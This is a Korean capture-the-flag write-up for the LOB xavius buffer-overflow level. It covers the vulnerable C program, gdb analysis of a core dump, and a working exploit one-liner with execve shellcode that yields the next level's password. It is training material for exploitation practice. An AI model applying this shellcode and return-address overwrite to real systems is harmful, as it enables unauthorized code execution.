[lob] nightmare -> xavius

1. intro

 

2. code 및 분석

2.1.  C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - xavius
        - arg
*/

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

main()
{
        char buffer[40];
        char *ret_addr;

        // overflow!
        fgets(buffer, 256, stdin);
        printf("%s\n", buffer);

        if(*(buffer+47) == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(*(buffer+47) == '\x08')
        {
                printf("binary image retbayed you, too!!\n");
                exit(0);
        }

        // check if the ret_addr is library function or not
        memcpy(&ret_addr, buffer+44, 4);
        while(memcmp(ret_addr, "\x90\x90", 2) != 0)     // end point of function
        {
                if(*ret_addr == '\xc9'){                // leave
                        if(*(ret_addr+1) == '\xc3'){    // ret
                                printf("You cannot use library function!\n");
                                exit(0);
                        }
                }
                ret_addr++;
        }

        // stack destroyer
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}

 

2.2. 분석

ret address가 \xbf도 안되고 \x08도 안된다.

그리고 ret address의 값을 비교하며 library 영역인지 확인하고 맞다면 종료한다.

 

그런 다음 buffer 영역 앞 뒤를 다 0으로 날려버린다. 

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

ret address 변조가 가능하다.

 

3.2. 공격 준비

다 날렸는데 어딜 쓰지...?

대충 가젯 찾아서 리턴해버릴까...?

우선 인자로 A를 100여개 쓰고 생성된 core 파일을 뒤져보았다.

[nightmare@localhost nightmare]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./xaviua'.
Program terminated with signal 11, Segmentation fault.
#0  0x40077f72 in ?? ()
(gdb) x/40x 0x40077f72
0x40077f72:     Cannot access memory at address 0x40077f72
(gdb) x/x $ebp
0xbffffb18:     0x61616161
(gdb) x/x $eip
0x40077f72:     Cannot access memory at address 0x40077f72
(gdb) x/40x $esp
0xbffffad8:     0x4000ae60      0x080487a5      0x61616161      0x08048902
0xbffffae8:     0x00000002      0x61616161      0x61616161      0x61616161
0xbffffaf8:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb08:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb18:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb28:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb38:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb48:     0x61616161      0x61616161      0x61616161      0x4000000a
0xbffffb58:     0xbffffb5c      0x40013e90      0x00000001      0xbffffc5a
0xbffffb68:     0x00000000      0xbffffc63      0xbffffc77      0xbffffc8f
(gdb) x/x  0x4000ae60
0x4000ae60:     Cannot access memory at address 0x4000ae60
(gdb) x/x  0x40013e90
0x40013e90:     0x00000000
(gdb) x/40x  0x40013e90
0x40013e90:     0x00000000      0x00000000      0x00000000      0x00000000
...
0x40014ff0:     0x00000000      0x00000000      0x00000000      0x00000000
0x40015000:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015010:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015020:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015030:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015040:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015050:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015060:     0x61616161      0x0000000a      0x00000000      0x00000000
0x40015070:     0x00000000      0x00000000      0x00000000      0x00000000

오호.

임의의 영역에 인자 값들이 들어있음을 확인할 수 있었다.

여기로 return 하면 되겠다!

 

4. exploit

[nightmare@localhost nightmare]$ (python -c 'print "\x90"*(44-28) + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x00\x51\x01\x40"') | ./xaviua
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                      ̀
euid = 518
beg for me
[nightmare@localhost nightmare]$ (python -c 'print "\x90"*(44-28) + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x00\x51\x01\x40"') | ./xavius
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                      ̀
euid = 519
throw me away